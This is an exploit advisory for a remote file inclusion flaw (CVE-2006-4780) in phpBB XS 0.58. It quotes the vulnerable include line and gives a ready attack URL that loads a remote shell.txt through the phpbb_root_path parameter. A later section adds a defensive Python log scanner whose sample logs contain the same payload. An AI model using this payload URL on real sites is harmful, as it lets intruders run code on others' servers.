phpBB XS <= 0.58 functions.php Remote File Include Vulnerability

2006-09-12T00:00:00
ID EDB-ID:2349
Type exploitdb
Reporter AzzCoder
Modified 2006-09-12T00:00:00

Description

phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability. CVE-2006-4780. Webapps exploit for php platform

                                        
Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

// $phpbb_root_path is not initialized before use

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]
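
A log check for the request pattern described above, added here as an example and not part of the original advisory: it scans web server access logs for requests that set phpbb_root_path to a URL rather than a local path. The log lines, client addresses and the example.invalid host are constructed, and the combined access log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value that begins with a URL scheme, where a local path is expected.
SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.IGNORECASE)
# Parameter named in the advisory; PHP variable names are case-sensitive.
PATH_PARAMS = {"phpbb_root_path"}

def suspicious_include(line):
    """Return the decoded value if the request sets phpbb_root_path to a URL."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        value = unquote(value)
        if key in PATH_PARAMS and SCHEME_RE.match(value):
            return value
    return None

# Constructed sample log (documentation address ranges, placeholder host).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Sep/2006:10:01:02 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120
198.51.100.7 - - [12/Sep/2006:10:01:09 +0000] "GET /forum/includes/functions.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.0" 200 311
198.51.100.7 - - [12/Sep/2006:10:01:15 +0000] "GET /forum/includes/functions.php?phpbb_root_path=ftp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 311
192.0.2.44 - - [12/Sep/2006:10:02:30 +0000] "GET /forum/index.php?phpbb_root_path=./ HTTP/1.1" 200 4096
"""

def scan(log_text):
    """Return (line_number, client, value) for every flagged request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        value = suspicious_include(line)
        if value is not None:
            hits.append((n, line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for n, client, value in scan(SAMPLE_LOG):
        print(f"line {n}: {client} set phpbb_root_path to {value!r}")
```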